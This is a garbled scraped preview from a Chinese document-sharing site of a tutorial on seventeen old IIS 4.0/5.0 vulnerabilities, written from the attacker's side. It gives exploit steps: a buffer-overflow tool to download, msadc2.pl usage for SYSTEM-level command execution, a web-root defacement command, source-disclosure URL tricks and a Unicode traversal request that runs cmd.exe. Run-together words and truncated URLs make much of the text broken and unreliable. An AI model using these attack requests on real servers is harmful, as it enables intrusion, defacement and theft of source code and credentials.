欢迎来到天天文库
浏览记录
ID:22691988
大小:59.50 KB
页数:7页
时间:2018-10-30
《iis的十七个常见安全漏洞》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、IIS的十七个常见安全漏洞 iis4hack缓冲溢出 主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面的站点.technotronic.去下载,另外你还需要一台自己的DAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这
2、命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help [quackchatquack]$perlmsadc2.pl-h --RDSsmackv2-rainforestpuppy/ADM/sadc.pl-h{-d-X-v} -h=hostyouain) -d=delaybetpIndexServerpathtable,ifavailable -N=queryVbBusObjforNetBIOSname -V=useVbB
3、usObjinsteadofActiveDataFactory -v=verbose -e=externaldictionaryfileforstep5 -u<hostsharefile>=useUNCfile -ea(v2)mandsession [quackchatquack]$perlmsadc2.pl-h --RDSsmackv2-rainforestpuppy/ADM/andlineyoud/cassumed): cmd/c 如果出现cmd/c后
4、,直接键入命令行,就可以以system权限执行命令了。比如xundi教的: echohackedbyme>d:ipubrootvictim Codebrples/exair/hoples/exair/hosadc/samples/selector/shosadc/../../../../../p;%20CiRestriction=none%20%20CiHiliteType=full p;.htatoftheQUERY_STRINGisinvalid这就表示你存在这个漏洞.这个问题主要就是ples/is
5、samples/oop/qfullhit.htples/issamples/oop/qsumrhit.htples/exair/search/qfullhit.htples/exair/search/qsumrhit.htisc/iirturnh.htw(这个一般为loopback使用) 一个攻击者可以使用如下的方法来访问系统中文件的内容: .vi123下一页....,。ctim.iissamples/issamples/oop/qfullhit.htp;cirestriction=nonecihilite
6、type=full 就会在有此漏洞系统中s(::$DATA)要查看一些.asp文件的内容,你可以请求如下的URL:default.asp::$DATA你就得到了源代码 ASPDotBug 在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。 sample.asp. ISM.DLL 这个漏洞是由CerberusInformationSecurityteam.最早发现的,它运行在IIS4.0和5.0上面,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者?%20?(这些表示空格)
7、并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLLISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL程序把传递过来的文件打开和执行,但在ISM.DLL截断信息之前,缓冲区发送一个截断开的.Htr并会有一些时间去返回一些你要打开的文件内容.除非.DLL第一次装入内存时工作.NS发现追加+号到没有一次攻击这个问题,可以进行多次攻击。 idc.idaBugs 这个漏洞实际上类似ASPdot漏洞,其能在II
8、S4.0上显示其ples 通过请求site.csc,一般保存在/adsamples/config/site.csc中,攻击者可能获得一些如数据库中的DSN,UID和PASS的一些信息,如: adsamples/config/site.csc /iisadmpp32isrviisadmp32/cmd.exe?/c+dir scripts/..%c0%a
此文档下载收益归作者所有